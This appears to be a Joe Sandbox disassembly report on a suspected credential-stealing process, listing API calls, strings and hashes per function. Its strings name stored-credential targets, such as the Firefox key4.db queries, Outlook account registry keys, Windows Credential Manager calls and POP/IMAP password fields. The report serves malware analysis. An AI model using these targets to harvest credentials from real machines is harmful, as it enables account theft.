                                                                                                                                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                          • Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                                          • Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                                                            • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                                                            • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                          • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                          • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                          • Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                                          • Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040FA5C
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                                                                                                                                                                                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                                                                                                                                                                                                            • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FABA
                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FAC5
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAA1
                                                                                                                                                                                                                            • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                                                                                            • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                                                          • API String ID: 912701516-1821301763
                                                                                                                                                                                                                          • Opcode ID: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                                                          • Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                                                                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                                                                                          • key4.db, xrefs: 00406632
                                                                                                                                                                                                                          • C@, xrefs: 00406625
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                                                                                          • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                          • API String ID: 2950547843-1835927508
                                                                                                                                                                                                                          • Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                                          • Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                                                          • API String ID: 3540791495-3849865405
                                                                                                                                                                                                                          • Opcode ID: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                                                          • Instruction ID: 3c8b7fd7a28504c7ca875bf426ab9eeebffe21bfd5384a9a2131e9ee4f2c6c2c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB31AD72408384AFD7209F91D940A9BBBE9EF84354F04493FFAC4A2291D778D9548F6A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$strlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4288758904-3916222277
                                                                                                                                                                                                                          • Opcode ID: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                                                          • Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004084C2
                                                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 00408506
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040859A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004085BE
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00408612
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                          • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                          • API String ID: 1371990430-260894208
                                                                                                                                                                                                                          • Opcode ID: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                                                          • Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                                                                                                                                                                                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                                                                                                                                                                                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                                                                                                                                                                                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                                                                                                                                                                                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                          • API String ID: 2859077140-2022683286
                                                                                                                                                                                                                          • Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                                                          • Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406A6A
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406A7A
                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406A94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                          • API String ID: 2881943006-572158859
                                                                                                                                                                                                                          • Opcode ID: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                                          • Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004093F7
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409407
                                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                                                                                                                                                                                                            • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                          • API String ID: 888011440-2039793938
                                                                                                                                                                                                                          • Opcode ID: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                                                          • Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00409A04
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00409A21
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                          • String ID: $$d
                                                                                                                                                                                                                          • API String ID: 2915808112-2066904009
                                                                                                                                                                                                                          • Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                                          • Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                          • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                          • Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                                          • Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                          • Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                                          • Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                                                                                            • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                                                                                            • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2432066023-0
                                                                                                                                                                                                                          • Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                          • Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F396
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                                                                                                                                                                                                          • _strnicmp.MSVCRT ref: 0040F3C7
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.26336328215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                          • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                          • API String ID: 945165440-3589380929
                                                                                                                                                                                                                          • Opcode ID: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                                                          • Instruction ID: 060cf85e61608373f285e6b38907096c177b9006a2a87b36be12541c3eea0e32
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3537b1fcb66bcdc9fcff810ba9b7ca2134040b22c3a5e9a54c7dacba821f27a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 034157B1408345AFD720DF24D88496BBBE8FB95314F004A3EF995A3691D734ED48CB66
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                                                            • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                                                          • strchr.MSVCRT ref: 00403711
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040373A
                                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040374A
                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040376A
